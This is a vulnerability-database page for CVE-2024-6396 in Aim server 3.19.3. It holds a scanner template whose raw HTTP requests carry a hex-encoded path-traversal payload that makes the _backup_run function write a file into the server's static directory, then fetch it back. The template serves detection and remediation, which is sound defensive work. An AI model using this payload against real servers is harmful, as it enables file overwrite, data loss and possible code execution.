| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-6396 | 12 Jul 202402:41 | – | circl | |
| Aim security breach | 11 Jul 202400:00 | – | cnnvd | |
| CVE-2024-6396 | 12 Jul 202400:00 | – | cve | |
| CVE-2024-6396 Arbitrary File Overwrite and Data Exfiltration in aimhubio/aim | 12 Jul 202400:00 | – | cvelist | |
| CVE-2024-6396 | 12 Jul 202400:15 | – | nvd | |
| PT-2024-37593 · Aimhubio · Aim | 12 Jul 202400:00 | – | ptsecurity | |
| CVE-2024-6396 | 5 Feb 202502:50 | – | redhatcve | |
| Arbitrary File Overwrite | 12 Jul 202406:46 | – | veracode | |
| VulnCheck KEV: CVE-2024-6396 | 16 Sep 202400:00 | – | vulncheck_kev | |
| CVE-2024-6396 Arbitrary File Overwrite and Data Exfiltration in aimhubio/aim | 12 Jul 202400:00 | – | vulnrichment |
id: CVE-2024-6396
info:
name: Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.
impact: |
Unauthenticated attackers can overwrite arbitrary files on the host server and exfiltrate data by manipulating the _backup_run function parameters, potentially achieving denial of service, data loss, or remote code execution.
remediation: |
Update Aimhubio Aim to version 3.19.4 or later to address the arbitrary file overwrite vulnerability.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-6396
cwe-id: CWE-29
epss-score: 0.53394
epss-percentile: 0.9886
cpe: cpe:2.3:a:aimstack:aim:*:*:*:*:*:*:*:*
metadata:
max-request: 3
verified: true
fofa-query: icon_hash="-1047157256"
product: aim
vendor: aimstack
tags: cve,cve2024,aim,aimhubio,file-write,vkev,vuln
variables:
filename: "{{rand_base(7)}}"
args: "{{ concat(hex_decode('000000000001000000060a000000fe0000000000000000fe004b000000042e2e2f2e2e2f2e2e2f2e2e2f7573722f6c6f63616c2f6c69622f707974686f6e332e392f736974652d7061636b616765732f61696d5f75692f6275696c642f'),filename, hex_decode('2e747874')) }}"
http:
- raw:
- |
POST /tracking/client_1/get-resource HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"resource_handler": "my_resource",
"resource_type": "Repo",
"args": "AAAAAAABAAAABw=="
}
- |
POST /tracking/client_1/read-instruction HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"resource_handler": "my_resource",
"method_name": "_backup_run",
"args": "{{base64(args)}}"
}
- |
@Host: http://{{Host}}:43800
GET /static-files/{{filename}}.txt HTTP/1.1
Host: {{Host}}:43800
matchers-condition: and
matchers:
- type: word
part: body_1
words:
- '{"handler":"my_resource"}'
- type: word
part: body_3
words:
- "{{filename}}.txt"
- type: word
part: header_3
words:
- "text/plain"
# digest: 4a0a00473045022100ee34d3e43fd84b3dbeda1bb999d88f8f4db07d6e40c3051cd4cbfd26839edcb7022066c76e81a7e58879d97cf84156bd77e3f36bc0714404210861926eeb2941449b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation